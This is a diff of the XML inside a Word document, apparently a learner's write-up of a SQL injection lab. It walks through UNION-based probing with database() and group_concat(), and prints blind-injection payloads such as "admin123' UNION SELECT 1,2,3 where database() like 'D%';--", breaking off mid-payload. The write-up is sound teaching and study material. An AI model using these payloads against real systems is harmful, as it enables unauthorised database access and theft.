+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We can easily retrieve data from the database by just entering an expected number to the database. We can retrieve more data using the key word UNION. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>How UNION works?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Union lets you trick the database by entering a number as expected, then after the number you type UNION to tell the database that you are not finished, and you demand more data. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32516232" wp14:editId="672F0948">
+            <wp:extent cx="5725160" cy="1955800"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
+            <wp:docPr id="30" name="Picture 30"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="1955800"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Getting error in SQLi is the first step towards breaking the database. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The attacker should aim for getting error before trying to exploit. This error tells us that the second database has different columns than we entered. Therefore, let us try adding one column:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E5A56F2" wp14:editId="6413EA24">
+            <wp:extent cx="5725160" cy="1939925"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
+            <wp:docPr id="34" name="Picture 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="1939925"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>We still get the same error. Let us add one more column:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3C05F9" wp14:editId="2396B261">
+            <wp:extent cx="5725160" cy="2250440"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="35" name="Picture 35"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="2250440"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>It worked. The second table has 3 columns. Let us now get the name of the database:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680DED33" wp14:editId="77FEC704">
+            <wp:extent cx="5725160" cy="2321560"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
+            <wp:docPr id="37" name="Picture 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="2321560"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>We replaced a column with “</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -6177,7 +7575,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>similar to</w:t>
+        <w:t>database(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -6186,24 +7584,962 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the previous </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>one,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> we only had to find a way to manipulate the POST request. </w:t>
-      </w:r>
+        <w:t xml:space="preserve">)” to get the name of the database. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Also</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you can notice that we changed the id value from 1 to 0, this is because we do not care about the return of the first part of the query</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, we care about the return of the UNUION SELECT statement.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now we can ask for all the tables in that database. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D44EB30" wp14:editId="2A59F9BD">
+            <wp:extent cx="5725160" cy="1160780"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
+            <wp:docPr id="38" name="Picture 38"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="1160780"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>And it returns:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B87D9D8" wp14:editId="3E9AB978">
+            <wp:extent cx="5725160" cy="2146935"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="5715"/>
+            <wp:docPr id="39" name="Picture 39"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId43">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5725160" cy="2146935"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This tells us that we have 2 tables: article and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>staff_users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, and we can access them using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>group_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 where </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>database(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>) like 'D%';--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This query helps us to guess the database name. We keep entering values in the LIKE statement, as long as we get true as a respond, that means that the input letter/number is true. We keep guessing every letter until we get the whole name.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>What is step 2?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
